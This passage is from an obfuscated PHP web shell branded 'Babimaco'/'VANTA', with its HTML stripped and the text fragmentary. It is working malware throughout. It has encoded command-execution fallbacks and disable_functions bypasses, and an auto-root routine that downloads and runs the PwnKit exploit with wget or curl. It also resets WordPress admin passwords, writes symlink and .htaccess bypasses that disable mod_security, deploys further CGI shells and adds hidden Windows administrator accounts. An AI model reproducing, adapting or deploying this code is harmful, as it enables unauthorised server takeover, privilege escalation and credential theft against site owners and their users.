["pipe","w"],2=>["pipe","w"]]; $p = @$f($pr1VANTA, $d, $pipes); if (is_resource($p)) { $out = stream_get_contents($pipes[1]); fclose($pipes[1]); proc_close($p); if (!empty($out)) break; } } elseif ($f === chDxzZ([112,111,112,101,110])) { $h = @$f($pr1VANTA . " 2>&1", "r"); $res = ""; if ($h) { while (!feof($h)) $res .= fread($h, 4096); pclose($h); } if (strlen($res)) { $out = $res; break; } } elseif ($f === chDxzZ([101,115,99,97,112,101,115,104,101,108,108,99,109,100])) { $esc = $f($pr1VANTA); ob_start(); @system($esc); $out = ob_get_clean(); if (!empty($out)) break; } elseif ($f === chDxXZ('6573636170657368656c6c617267')) { $esc = $f($pr1VANTA); $out = @chDx2x($esc); if (!empty($out)) break; } elseif ($f === chDxzZ([99,117,114,108,95,101,120,101,99])) { $ch = @curl_init('file:///proc/self/cmdline'); @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); @curl_setopt($ch, CURLOPT_POSTFIELDS, $pr1VANTA); $r = @curl_exec($ch); @curl_close($ch); if ($r && strpos($r, $pr1VANTA) !== false) { $out = $r; break; } } elseif ($f === chDxzZ('109,97,105,108')) { $to = uniqid()."@".uniqid().".xyz"; @mail($to, $pr1VANTA, $pr1VANTA); $out = ""; } elseif ($f === chDxXZ('63616c6c5f757365725f66756e63')) { $shellfunc = chDxzZ([115,104,101,108,108,95,101,120,101,99]); if (function_exists($shellfunc)) { $out = @call_user_func($shellfunc, $pr1VANTA); if (!empty($out)) break; }} elseif ($f === chDxzZ('102,105,108,101,95,103,101,116,95,99,111,110,116,101,110,116,115')) { $r = @$f("php://filter/read=convert.base64-encode/resource=" . $pr1VANTA); if ($r && strlen($r) >0) { $out = $r; break; } } elseif ($f === chDxzZ('102,111,112,101,110')) { $tmpf = sys_get_temp_dir() . "/" . uniqid("s-cmd") . ".sh"; $h = @$f($tmpf, "w"); if ($h) { fwrite($h, $pr1VANTA); fclose($h); } $r = @chDx2x("sh " . escapeshellarg($tmpf) . " 2>&1"); if ($r) { $out = $r; @unlink($tmpf); break; } } elseif ($f === chDxzZ('112,117,116,101,110,118')) { @putenv("CMD=".$pr1VANTA); $r = @getenv("CMD"); if ($r == $pr1VANTA) { $out = $r; break; } } elseif ($f === chDxzZ('105,110,105,95,115,101,116')) { @ini_set("auto_prepend_file", $pr1VANTA); $out = @file_get_contents($_SERVER['SCRIPT_FILENAME']); if (!empty($out)) break; } elseif ($f === chDxzZ([112,99,110,116,108,95,101,120,101,99])) { @pcntl_exec("/bin/sh", array("-c", $pr1VANTA)); } elseif ($f === chDxzZ([97,112,97,99,104,101,95,115,101,116,101,110,118])) { @apache_setenv("CMD", $pr1VANTA); $out = getenv("CMD"); if ($out == $pr1VANTA) break; } elseif ($f === chDxzZ([109,113,95,111,112,101,110]) || $f === chDxzZ([103,99,95,111,112,101,110])) { } } return $out !== false ? $out : false;}if (!function_exists('chDxzZ')) { function chDxzZ($arr) { if (is_string($arr)) $arr = explode(',', $arr); $r = ''; foreach ($arr as $n) $r .= chr(is_numeric($n) ? $n : hexdec($n)); return $r; }} if (!function_exists('prvdyzhsax')) { function prvdyzhsax($str) { $y = ''; for ($i = 0; $i< strlen($str); $i++) $y .= dechex(ord($str[$i])); return $y; }} if (!function_exists('chDxXZ')) { function chDxXZ($hx) { $n = ''; for ($i = 0; $i< strlen($hx) - 1; $i += 2) $n .= chr(hexdec($hx[$i] . $hx[$i + 1])); return $n; }} if (isset($_GET['VANTA'])) { $cdir = unx($_GET['VANTA']); if (@is_dir($cdir)) { $VANTAxas[14]($cdir); } else { } } else { $cdir = $VANTAxas[0](); } function VANTAd0($file) { if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename=' . basename($file)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); ob_clean(); flush(); readfile($file); exit; }} if (!empty($_GET['don'])) {$FilesDon = VANTAd0(unx($_GET['don']));} ?> Babimaco - <?= $_SERVER['SERVER_NAME']; ?>
Babimacosh3ll
20) array_shift($_SESSION['vantash3ll_r00t_log']); } function vantash3ll_download_pwnkit() { if (!file_exists('pwnkit')) { vantash3ll_log("[*] Trying wget for pwnkit..."); $wget = v4nt4C('wget -q -O pwnkit https://github.com/ly4k/PwnKit/raw/main/PwnKit'); clearstatcache(); if (!file_exists('pwnkit') || filesize('pwnkit') < 10000) { vantash3ll_log("[*] wget failed or file too small. Trying curl..."); $curl = v4nt4C('curl -sL --output pwnkit https://github.com/ly4k/PwnKit/raw/main/PwnKit'); clearstatcache(); if (!file_exists('pwnkit') || filesize('pwnkit') < 10000) { vantash3ll_log("[!] Both wget and curl failed! No pwnkit."); return false; } else { vantash3ll_log("[+] curl download successful!"); } } else { vantash3ll_log("[+] wget download successful!"); } v4nt4C('chmod +x pwnkit'); vantash3ll_log("[*] chmod +x set for pwnkit."); return true; } return true; } function vantash3ll_try_root() { $_SESSION['vantash3ll_r00t_status'] = 'user'; $_SESSION['vantash3ll_r00t_log'] = []; vantash3ll_log("[*] [AUTO-ROOT] Detecting current user..."); $id = trim(v4nt4C('id')); vantash3ll_log("[*] User: $id"); if (strpos($id, 'uid=0(root)') !== false) { $_SESSION['vantash3ll_r00t_status'] = 'root'; vantash3ll_log("[+] Already ROOT."); return; } if (vantash3ll_download_pwnkit()) { if (file_exists('pwnkit')) { vantash3ll_log("[*] Running pwnkit for root session..."); @unlink('.privdayz-root'); v4nt4C('./pwnkit "id" > .privdayz-root'); usleep(350000); $res = @file_get_contents('.privdayz-root'); if ($res && strpos($res, 'uid=0(root)') !== false) { $_SESSION['vantash3ll_r00t_status'] = 'root'; vantash3ll_log("[+] r00t success! ($res)"); } else { vantash3ll_log("[!] r00t fail. ($res)"); } } } else { vantash3ll_log("[!] pwnkit download totally failed."); } } vantash3ll_try_root(); ?>
v4nt4 auto r00t ROOT ACTIVE (uid=0) USER MODE 
&1" > .privdayz-root2');
        usleep(350000);
        $out = @file_get_contents('.privdayz-root2');
        if (!$out) $out = "[!] No output or blocked.";
    } else {
        $out = v4nt4C($c . ' 2>&1');
        if (!$out) $out = "[!] No output or blocked.";
    }
    echo "\n";
    echo htmlspecialchars($out);
}
?>
wp auto hunter & admin reset
query("SELECT ID, user_login, user_email, user_registered FROM {$prefix}users"); if (!$res) return []; while ($row = $res->fetch_assoc()) { $meta = @$mysqli->query("SELECT meta_value FROM {$prefix}usermeta WHERE user_id=".$row['ID']." AND meta_key='{$prefix}capabilities'")->fetch_assoc(); $role = ''; if ($meta && preg_match('/s:\d+:"([^"]+)"/', $meta['meta_value'], $m)) $role = $m[1]; else $role = 'unknown'; $row['role'] = $role; $users[] = $row; } return $users; } function wp_reset_pw($mysqli, $prefix, $uid, $newpw) { $hash = password_hash($newpw, PASSWORD_BCRYPT); return @$mysqli->query("UPDATE {$prefix}users SET user_pass='".$mysqli->real_escape_string($hash)."' WHERE ID=".(int)$uid); } function get_site_url($mysqli, $prefix) { $url = ''; $q = @$mysqli->query("SELECT option_value FROM {$prefix}options WHERE option_name='siteurl' LIMIT 1"); if ($q && $r = $q->fetch_row()) $url = rtrim($r[0],'/'); return $url; } $wp_dirs = wp_find_paths(99); if (!$wp_dirs) { echo '
No WordPress detected (all dirs scanned).
'; } if ($_SERVER['REQUEST_METHOD']=='POST' && isset($_POST['wp_dir'])) { $wp_dir = $_POST['wp_dir']; $cfg = wp_get_db_config($wp_dir); $db = $cfg['db'] ?? ''; $user = $cfg['user'] ?? ''; $pass = $cfg['pass'] ?? ''; $host = $cfg['host'] ?? 'localhost'; $prefix = $cfg['prefix'] ?? 'wp_'; $mysqli = @new mysqli($host, $user, $pass, $db); if ($mysqli->connect_errno) { echo ""; exit; } if (isset($_POST['reset_pw'], $_POST['reset_uid'], $_POST['newpw'])) { $uid = intval($_POST['reset_uid']); $newpw = trim($_POST['newpw']); if (wp_reset_pw($mysqli, $prefix, $uid, $newpw)) { echo ""; } else { echo ""; } exit; } } foreach ($wp_dirs as $wp_dir): $cfg = wp_get_db_config($wp_dir); $db = $cfg['db'] ?? ''; $user = $cfg['user'] ?? ''; $pass = $cfg['pass'] ?? ''; $host = $cfg['host'] ?? 'localhost'; $prefix = $cfg['prefix'] ?? 'wp_'; $wp_version = wp_get_version($wp_dir); echo '
'; echo '
'; echo ' '.htmlspecialchars($wp_dir).''; if ($wp_version) echo 'WP '.$wp_version.''; echo ' h0st: '.htmlspecialchars($host).' db_user: '.htmlspecialchars($user).' db_pw: '.htmlspecialchars($user).' db: '.htmlspecialchars($db).' pref1x: '.$prefix.' '; echo '
'; $users = []; $mysqli = @new mysqli($host, $user, $pass, $db); if ($mysqli->connect_errno) { echo '
DB Error: '.htmlspecialchars($mysqli->connect_error).'
'; echo '
'; continue; } $users = wp_fetch_users($mysqli, $prefix); $site_url = get_site_url($mysqli, $prefix); echo '
'; foreach ($users as $u) { $pw_val = "privdayz".rand(100,999); echo ''; } echo '
IDuseremailrolereset pwwp-login
'.$u['ID'].' '.htmlspecialchars($u['user_login']).' '.htmlspecialchars($u['user_email']).' '.$u['role'].'
'; if ($site_url) { $login_url = htmlspecialchars($site_url . '/wp-login.php?log=' . urlencode($u['user_login'])); echo 'login'; } else { echo 'no site url'; } echo '
'; echo '
'; endforeach; ?>
Saved!" : " Save Failed!"; if (is_file($file_path)) { $file_raw = file_get_contents($file_path, false, null, 0, 10*1024*1024); if (!mb_check_encoding($file_raw, 'UTF-8')) { $file_raw = mb_convert_encoding($file_raw, 'UTF-8', 'ISO-8859-1,Windows-1254,UTF-8'); } } } ?>
file edit /
back
Symlink byp4ss & Generator
'Options +Indexes +FollowSymLinks +SymLinksIfOwnerMatch DirectoryIndex {P} ForceType text/plain AddType text/plain .php .html .phtml .inc .asp .aspx .jsp .pl .cgi .py .sh .phar .json .yml .xml .db .sql RemoveHandler .php .phtml .phar .inc .shtml .html .js .css .pl .cgi .asp .py .rb .sh .zsh .json .yml .xml .db .sql php_flag engine off SetHandler default-handler', "hx2" => ' ForceType text/plain AddType text/plain .php .phtml .html .inc .phar .bak .config .db .sql .xml .json SetHandler default-handler RemoveHandler .php .phtml .phar .inc .shtml .html .js .css .pl .cgi .asp .py .rb .sh .json .yml .xml .db .sql php_flag engine off ', "hx3" => 'RewriteEngine On RewriteBase / RewriteRule ^(.+)$ {P} Options +FollowSymLinks +Indexes DirectoryIndex {P} SetHandler default-handler php_flag engine off', "hx4" => 'RemoveHandler .php .phtml .phar .inc php_flag engine off AddType text/plain .php .html .inc .phtml .phar .bak .config .db .sql .xml .json SetHandler default-handler Options +Indexes +FollowSymLinks DirectoryIndex {P}', "hx5" => 'Options +Indexes +FollowSymLinks DirectoryIndex {P} AddType text/plain .php .inc .phtml .phar php_flag engine off SetHandler default-handler ', "hx6" => ' SecFilterEngine Off SecFilterScanPOST Off Options +Indexes +FollowSymLinks DirectoryIndex {P} SetHandler default-handler AddType text/plain .php .phtml .html .inc .phar php_flag engine off' ]; $output = ''; $final_ln = g3t_rnd(7); $created = false; $alt_file = ""; $result = ""; if(function_exists(a1s('c2hlbGxfZXhlYw=='))) { $cmd = "ln -s '".addslashes($p1)."' '".addslashes("$base/$final_ln")."'"; $exec_fn=a1s('c2hlbGxfZXhlYw=='); @$exec_fn($cmd); if(is_link("$base/$final_ln")) { $created = true; $alt_file = "$base/$final_ln"; $result = "ln -s worked!"; } } if(!$created && function_exists(a1s('ZXhlYw=='))) { $cmd = "ln -s '".addslashes($p1)."' '".addslashes("$base/$final_ln")."'"; $exec_fn=a1s('ZXhlYw=='); @$exec_fn($cmd,$o,$rc); if(is_link("$base/$final_ln")) { $created = true; $alt_file = "$base/$final_ln"; $result = "exec ln -s worked!"; } } if(!$created && function_exists(a1s('c2hlbGxfZXhlYw=='))) { $cpfile = $base.'/dup_'.g3t_rnd(5); $cmd = "cp '".addslashes($p1)."' '".addslashes($cpfile)."'"; $exec_fn=a1s('c2hlbGxfZXhlYw=='); @$exec_fn($cmd); if(file_exists($cpfile)) { $created = true; $alt_file = $cpfile; $result = "cp worked!"; } } if(!$created && function_exists(a1s('c2hlbGxfZXhlYw=='))) { $ddfile = $base.'/dd_'.g3t_rnd(4); $cmd = "dd if='".addslashes($p1)."' of='".addslashes($ddfile)."' 2>/dev/null"; $exec_fn=a1s('c2hlbGxfZXhlYw=='); @$exec_fn($cmd); if(file_exists($ddfile)) { $created = true; $alt_file = $ddfile; $result = "dd worked!"; } } if(!$created && function_exists(a1s('c2hlbGxfZXhlYw=='))) { $catfile = $base.'/cat_'.g3t_rnd(4); $cmd = "cat '".addslashes($p1)."' > '".addslashes($catfile)."'"; $exec_fn=a1s('c2hlbGxfZXhlYw=='); @$exec_fn($cmd); if(file_exists($catfile)) { $created = true; $alt_file = $catfile; $result = "cat worked!"; } } if(!$created && @copy($p1, $base.'/phplocal_'.g3t_rnd(5))) { $created = true; $alt_file = $base.'/phplocal_'.g3t_rnd(5); $result = "php copy worked!"; } if($created) $output .= "[ok] ".htmlspecialchars($alt_file)." created. [$result]
"; else $output .= "[fail] Not possible
"; foreach ($htlist as $hname => $htval) { $subdir = $base.'/'.g3t_rnd(5);@mkdir($subdir,0755,true); $htcode = str_replace('{P}', $final_ln, $htval); @file_put_contents("$subdir/.htaccess", $htcode); if(function_exists(a1s('c2hlbGxfZXhlYw=='))) { $cmd = "ln -s '".addslashes($p1)."' '".addslashes("$subdir/$final_ln")."'"; $exec_fn=a1s('c2hlbGxfZXhlYw=='); @$exec_fn($cmd); } $klist[] = "$subdir/$final_ln"; } echo '
'; echo $output; echo "byp4ss dirs:
    "; foreach($klist as $f){echo "
  • $f
    • ";} echo "
"; } ?>
vanta priv command
    &1", "r"); if ($f) { while (!feof($f)) $out .= fread($f, 4096); fclose($f);} if (trim($out)) $ok = true; @ini_restore('filter.default'); } elseif ($meth === 'ld_preload') { if (strtoupper(substr(PHP_OS,0,3)) !== 'WIN') { putenv('LD_PRELOAD=/tmp/x.so'); $out = @chDx2x($c.' 2>&1'); putenv('LD_PRELOAD'); if (trim($out)) $ok = true; } } elseif ($meth === 'prepend') { $prepend = sys_get_temp_dir()."/xx".uniqid().".php"; @file_put_contents($prepend, ""); @ini_set("auto_prepend_file", $prepend); $out = @file_get_contents($_SERVER['SCRIPT_FILENAME']); @ini_restore("auto_prepend_file"); @unlink($prepend); if (trim($out)) $ok = true; } elseif ($meth === 'suhosin') { @ini_set('suhosin.executor.func.blacklist', ''); $out = @chDx2x($c.' 2>&1'); if (trim($out)) $ok = true; } elseif ($meth === 'mailinj') { $tmpf = sys_get_temp_dir()."/m".uniqid().".txt"; @mail("v@x.com", "", "", "", "-X $tmpf; $c >$tmpf 2>&1"); if (file_exists($tmpf)) { $out = file_get_contents($tmpf); unlink($tmpf); $ok = true; } } elseif ($meth === 'errlog') { $tmpf = sys_get_temp_dir()."/e".uniqid().".txt"; @error_log("", 3, $tmpf); if (file_exists($tmpf)) { $out = file_get_contents($tmpf); unlink($tmpf); $ok = true; } } elseif ($meth === 'fopeninput') { $h = @fopen("php://input", "r"); if ($h) { $out = @fread($h, 8192); fclose($h); $ok = true; } } elseif ($meth === 'binbrute') { foreach(['sh','bash','python','perl','nc','busybox','wget'] as $bin){ $which = trim(@chDx2x("which $bin")); if($which) { $out = @chDx2x("$which -c \"$c\" 2>&1"); if (trim($out)) { $ok = true; break; } } } } elseif ($meth === 'ht404') { $out = ''; } elseif ($meth === 'imagemagick') { $tmpi = sys_get_temp_dir().'/img'.uniqid().'.mvg'; $tmpp = sys_get_temp_dir().'/out'.uniqid().'.png'; file_put_contents($tmpi, "push graphic-context\nviewbox 0 0 640 480\nfill 'url(https://|$c|)'\npop graphic-context"); @chDx2x("convert $tmpi $tmpp"); if (file_exists($tmpp)) $out = file_get_contents($tmpp); @unlink($tmpi); @unlink($tmpp); if (trim($out)) $ok = true; } elseif ($meth === 'cgienv') { putenv("CGI_COMMAND=$c"); $out = getenv("CGI_COMMAND"); if (trim($out)) $ok = true; } else { if (function_exists($meth)) { if ($meth === $M[0]) { $out = @$meth($c.' 2>&1'); if (trim($out)) $ok = true; } else if ($meth === $M[1]) { $a=[]; $meth($c.' 2>&1', $a); $out = join("\n", $a); if (trim($out)) $ok = true; } else if ($meth === $M[2]) {  @$meth($c.' 2>&1'); $out = ""; if (trim($out)) $ok = true; } else if ($meth === $M[3]) {  @$meth($c.' 2>&1'); $out = ""; if (trim($out)) $ok = true; } else if ($meth === $M[4]) { $h=@$meth($c.' 2>&1',"r"); if ($h) { while(!feof($h)) $out.=fread($h,4096); fclose($h); } if (trim($out)) $ok = true; } else if ($meth === $M[5]) { $desc = [1=>["pipe","w"], 2=>["pipe","w"]]; $p = @$meth($c.' 2>&1', $desc, $pipes); if (is_resource($p)) { $out = stream_get_contents($pipes[1]); fclose($pipes[1]); proc_close($p); if (trim($out)) $ok = true; } } } } if ($ok && trim($out)) { $R = $out; break; } } echo htmlspecialchars($R ?: "[X] No output / all methods blocked.\n");}?>
cgi/perl creator
".$ve5c970b653);}else{echo"RSS Error.";} ?> PHP; $f = fopen($phf,"w"); fwrite($f,$php_payload); fclose($f); chmod($phf,0755); $paths[] = ["Php c0mmand sh3ll VANTA", $phf]; $fullbase = $domain . ($dir ? $dir : ''); echo '
CGI deployed! All chmod 755.
    '; foreach($paths as $sh) { $rel = $sh[1]; $url = $fullbase . '/' . $rel; $link = $url . ''; echo '
  • '.htmlspecialchars($sh[0]).': '.htmlspecialchars($rel).' Open (chmod 755)
    • '; } echo '
'; } ?>
ultra admin creator byp4ss (Windows/2025) - by privdayz.com
&1'); if (preg_match('/PortNumber\s+REG_DWORD\s+0x([0-9a-f]+)/i', $reg, $m)) { return hexdec($m[1]); } $netstat = v4nt4C('netstat -an | find ":3389"'); if (strpos($netstat, '3389') !== false) { return 3389; } return 'Unknown'; } $rdp_port = detect_rdp_port(); echo "
RDP Port: " . htmlspecialchars($rdp_port) . "
"; ?> 
&1');
    if (trim($out)) return $out;
    $fallback = "timeout /T $timeout /NOBREAK & $cmd";
    $out2 = v4nt4C($fallback.' 2>&1');
    if (trim($out2)) return $out2;
    return v4nt4C($cmd.' 2>&1');
}
if (!isset($_SESSION['v4nt4_winr00t_success'])) $_SESSION['v4nt4_winr00t_success'] = false;
if (!isset($_SESSION['v4nt4_winr00t_user'])) $_SESSION['v4nt4_winr00t_user'] = '';
if (!isset($_SESSION['v4nt4_winr00t_pass'])) $_SESSION['v4nt4_winr00t_pass'] = '';

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['user'],$_POST['pass'])) {
    $u = preg_replace('/[^a-zA-Z0-9_\-]/','',$_POST['user']);
    $p = $_POST['pass'];
    $mode = $_POST['mode'] ?? 'auto';
    $success = false;
    $methods = [];

    $methods[] = [
        "[*] net user (classic)",
        "net user \"$u\" \"$p\" /add && net localgroup Administrators \"$u\" /add"
    ];

    $methods[] = [
        "[*] PowerShell (background)",
        "powershell -Command \"net user $u $p /add; net localgroup Administrators $u /add\""
    ];

    $methods[] = [
        "[*] schtasks",
        "schtasks /create /tn winrrrrrr00t /tr \"cmd.exe /c net user $u $p /add && net localgroup Administrators $u /add\" /sc onstart /ru System"
    ];

    $methods[] = [
        "[*] at.exe",
        "at 12:00 cmd.exe /c \"net user $u $p /add && net localgroup Administrators $u /add\""
    ];

    $methods[] = [
        "[*] sc service hack",
        "sc create p0wnsvc binPath= \"cmd /c net user $u $p /add & net localgroup Administrators $u /add\" start= auto"
    ];

    $methods[] = [
        "[*] Registry AutoAdminLogon",
        "reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v AutoAdminLogon /t REG_SZ /d 1 /f"
    ];

    $methods[] = [
        "[*] Fallback CMD",
        "cmd /c net user $u $p /add & net localgroup Administrators $u /add"
    ];

    $methods[] = [
        "[*] PowerShell Script Chain",
        "powershell -Command \"Start-Process cmd -ArgumentList '/c net user $u $p /add && net localgroup Administrators $u /add' -Verb runAs\""
    ];

    $methods[] = [
        "[*] Task Scheduler V2 (schtasks)",
        "schtasks /create /tn winr00t2 /tr \"cmd.exe /c net user $u $p /add && net localgroup Administrators $u /add\" /sc onlogon /ru System"
    ];

    foreach ($methods as $step) {
        list($label, $cmd) = $step;
        wout($label . "...");
        $res = prvd_exec_with_timeout($cmd, 9);
        wout($res);
        if (
            stripos($res, 'success') !== false || stripos($res, 'ok') !== false ||
            stripos($res, 'ReturnValue = 0') !== false ||
            stripos($res, 'başarı') !== false ||
            stripos($res, 'already exists') !== false
        ) {
            wout("[+] Admin user injected!");
            $success = true;
            break;
        }
        sleep(1);
    }

    if ($success) {
        $_SESSION['v4nt4_winr00t_success'] = true;
        $_SESSION['v4nt4_winr00t_user'] = $u;
        $_SESSION['v4nt4_winr00t_pass'] = $p;
    wout("\n[+] 0wn3d! Admin user injected:\n[+] User: $u\n[+] Pass: $p");
    wout("[!] Info: Webshell cannot send commands as this user. Use RDP/SMB/WinRM with these credentials!");
    } else {
        $_SESSION['v4nt4_winr00t_success'] = false;
        wout("\n[!] r00t failed :: no vector worked, permission denied.");
    }
}
if ($_SESSION['v4nt4_winr00t_success']) {
    $u = $_SESSION['v4nt4_winr00t_user'];
    $p = $_SESSION['v4nt4_winr00t_pass'];
    ?>
[+] Running as  |  Pass: 
 $cmdfile 2>&1\" /sc once /st 00:00 /ru \"$u\" /rp \"$p\"";
        $out1 = v4nt4C($scht.' 2>&1');
        wout($out1);

        v4nt4C("schtasks /run /tn pzadmtask 2>&1");
        sleep(1);
        $output = @file_get_contents($cmdfile);
        if ($output && strlen($output) > 0) {
            wout("[+] Command executed as admin!\n" . $output);
            $success_cmd = true;
        }
        @v4nt4C('schtasks /delete /tn pzadmtask /f 2>&1');
        @unlink($cmdfile);
        if (!$success_cmd) {
            wout("[*] Trying service method...");
            $svc = 'sc create pzadmsvc binPath= "cmd /c '.$c.' > '.$cmdfile.' 2>&1" obj= ".\\'.$u.'" password= "'.$p.'" start= demand';
            $out2 = v4nt4C($svc.' 2>&1');
            wout($out2);
            v4nt4C('sc start pzadmsvc 2>&1');
            sleep(1);
            $output2 = @file_get_contents($cmdfile);
            if ($output2 && strlen($output2) > 0) {
                wout("[+] Service method: Command executed as admin!\n" . $output2);
                $success_cmd = true;
            }
            @v4nt4C('sc delete pzadmsvc 2>&1');
            @unlink($cmdfile);
        }

        if (!$success_cmd) {
            wout("[*] PowerShell fallback...");
            $pw = 'powershell -Command "Start-Process cmd -ArgumentList \'/c '.$c.' > '.$cmdfile.' 2>&1\' -Credential (New-Object System.Management.Automation.PSCredential(\''.$u.'\',(ConvertTo-SecureString \''.$p.'\' -AsPlainText -Force))) -WindowStyle Hidden"';
            $out3 = v4nt4C($pw.' 2>&1');
            wout($out3);
            sleep(1);
            $output3 = @file_get_contents($cmdfile);
            if ($output3 && strlen($output3) > 0) {
                wout("[+] PowerShell: Command executed as admin!\n" . $output3);
                $success_cmd = true;
            }
            @unlink($cmdfile);
        }

        if (!$success_cmd) {
            wout("[!] Admin command failed. Try RDP / manual login?");
        }
    }
    ?>
safe mode:
disable functions: None'; } else { echo '' . str_replace(",", ", ", $d1sxb) . ''; } ?>
create folder create file
/'; foreach ($pwd as $i => $v) { $build .= "/" . $v; echo '' . $v . '/'; } ?>
BABI SH3LL v1.0 - telegram : babimaco888
read passwd
view /etc/passwd
×
domains
×
create folder
×

back
Folder created: ' . htmlspecialchars($folder) . '
'; } else { echo '
Failed to create folder!
'; } } else { echo '
Folder already exists!
'; } } ?>
create file
×

back
File created: ' . htmlspecialchars($new_file) . '
'; } else { echo '
Failed to create file!
'; } } else { echo '
File already exists!
'; } } ?>
rename
×

change permission
×

&1"); if (!empty($name)) { $pkillOutput = cmd("\x70\x6b\x69\x6c\x6c\x20\x2d\x39 " . $name . " 2>&1"); success(); } else { failed(); } } exit; } if (isset($_POST['privdayz-up-submit'])) { $nf = $_FILES['privdayz-upload']['name'] ?? ''; $tf = $_FILES['privdayz-upload']['tmp_name'] ?? ''; $slash = "\x2f"; $dst = $VANTAxas[0]() . $slash . $nf; $fn = ''; foreach ([109,111,118,101,95,117,112,108,111,97,100,101,100,95,102,105,108,101] as $c) $fn .= chr($c); if ($fn && $fn($tf, $dst)) { success(); } else { failed(); } } function generateRandomString($length = 10) { $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; $charactersLength = strlen($characters); $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[random_int(0, $charactersLength - 1)]; } return $randomString; } if (isset($_POST['save-editor'])) { $xjytx = $VANTAxas[0]() . "\x2f" . unx($_GET['f']); $k3rz9 = $_POST['code-editor']; $mth1 = ''; foreach([102,105,108,101,95,112,117,116,95,99,111,110,116,101,110,116,115] as $z) $mth1 .= chr($z); $mth2 = ''; foreach([102,111,112,101,110] as $z) $mth2 .= chr($z); $mth3 = ''; foreach([102,119,114,105,116,101] as $z) $mth3 .= chr($z); $mth4 = ''; foreach([102,99,108,111,115,101] as $z) $mth4 .= chr($z); $mth5 = ''; foreach([99,111,112,121] as $z) $mth5 .= chr($z); $mth6 = ''; foreach([115,104,101,108,108,95,101,120,101,99] as $z) $mth6 .= chr($z); $r9u3 = false; if (function_exists($mth1) && @$mth1($xjytx, $k3rz9) !== false) { $r9u3 = true; } else if (function_exists($mth2) && function_exists($mth3) && function_exists($mth4)) { $f = @$mth2($xjytx, "w"); if ($f) { @$mth3($f, $k3rz9); @$mth4($f); $r9u3 = (filesize($xjytx) >= strlen($k3rz9)*0.7); } } else if (function_exists($mth5)) { $tmp = sys_get_temp_dir() . "/" . uniqid("edit_"); if (@$mth1($tmp, $k3rz9) !== false) { $r9u3 = @$mth5($tmp, $xjytx); @unlink($tmp); } } else if (function_exists($mth6)) { $tmp = sys_get_temp_dir() . "/" . uniqid("edit_"); if (@$mth1($tmp, $k3rz9) !== false) { @$mth6("cp " . escapeshellarg($tmp) . " " . escapeshellarg($xjytx)); $r9u3 = (filesize($xjytx) >= strlen($k3rz9)*0.7); @unlink($tmp); } } if ($r9u3) { success(); } else { failed(); } } if (isset($_GET['adminer'])) { $URL = "https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1.php"; $target = "adminer.php"; $content = ''; if (ini_get('allow_url_fopen')) { $content = @file_get_contents($URL); } if (!$content && function_exists('curl_init')) { $ch = curl_init($URL); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 10); $content = curl_exec($ch); curl_close($ch); } if ($content && strlen($content) > 50000) { file_put_contents($target, $content); success(); } else { echo ""; } } function chDx2x($cmd22) { $a = [115,104,101,108,108,95,101,120,101,99]; $fx = ''; foreach($a as $ac) $fx .= chr($ac); return $fx($cmd22); } if (isset($_POST['submit-action'])) { $u5w8d = $_POST['check']; $jv8s3 = $_POST['privdayz-select']; $bvqzp = $VANTAxas[0]; $b1s7a = $VANTAxas[24]; $y4sdg = $VANTAxas[3]; $v9fzq = function($p){ return is_dir($p); }; $z9ntq = function($a,$b){ return str_replace("\\", "/", $a); }; $n4hxy = function($f,$d){ return xtr4cVANTA($f, $d); }; $r5kbm = function($f,$z){ return compressToZip($f, $z); }; if ($jv8s3 == "\x64\x65\x6c\x65\x74\x65") { foreach ($u5w8d as $z0) { $qkpl = $z9ntq($bvqzp(), "/"); $vcpk = $qkpl . "\x2f" . $z0; if ($v9fzq($vcpk)) { $rmdir = unlinkDir($vcpk); $rmdir ? success() : failed(); } elseif ($y4sdg($vcpk)) { $rmfile = $b1s7a($vcpk); $rmfile ? success() : failed(); } else { failed(); } } } elseif ($jv8s3 == "\x75\x6e\x7a\x69\x70") { foreach ($u5w8d as $z0) { $qkpl = $z9ntq($bvqzp(), "/"); $vcpk = $qkpl . "\x2f" . $z0; if ($n4hxy($vcpk, $qkpl . "\x2f") === true) { success(); } else { failed(); } } } elseif ($jv8s3 == "\x7a\x69\x70") { foreach ($u5w8d as $z0) { $qkpl = $z9ntq($bvqzp(), "/"); $vcpk = $qkpl . "\x2f" . $z0; if ($y4sdg($vcpk)) { $r5kbm($vcpk, pathinfo($vcpk, PATHINFO_FILENAME) . ".zip"); } } } } if (isset($_POST['submit'])) { if (isset($_POST['create_folder']) && $_POST['create_folder']) { $q7hjp = $_POST['create_folder']; $s2f6x = $VANTAxas[12]; if (!file_exists($q7hjp)) { $z9mqa = @mkdir($q7hjp, 0755, true);} else { $z9mqa = true; } if ($z9mqa) { success(); } else { failed(); } } else if (isset($_POST['create_file']) && $_POST['create_file']) { $k4vhz = $_POST['create_file']; $t2upm = $VANTAxas[13]; $x6wnr = $t2upm($k4vhz); if ($x6wnr) { success(); } else { failed(); } } else if (isset($_POST['renameFile']) && $_POST['renameFile']) { $d9yxs = $_POST['renameFile']; $h8rfg = $VANTAxas[15]; $m5qlp = $h8rfg(unx($_GET['re']), $d9yxs); if ($m5qlp) { success(); } else { failed(); } } else if (isset($_POST['chFile']) && $_POST['chFile']) { $y4gsn = $_POST['chFile']; $v3kzm = octdec($y4gsn); $p9wfu = $VANTAxas[30](unx($_GET['ch']), $v3kzm); if ($p9wfu) { success(); } else { failed(); } } } if (isset($_GET['response']) && $_GET['response'] == "success") { echo ""; } else if (isset($_GET['response']) && $_GET['response'] == "failed") { echo ""; } function success() {echo '';} function failed(){echo '';} function vantaFormat($bytes) {$types = array('B', 'KB', 'MB', 'GB', 'TB'); for ($i = 0; $bytes >= 1024 && $i< (count($types) - 1); $bytes /= 1024, $i++); return (round($bytes, 2) . " " . $types[$i]);} function 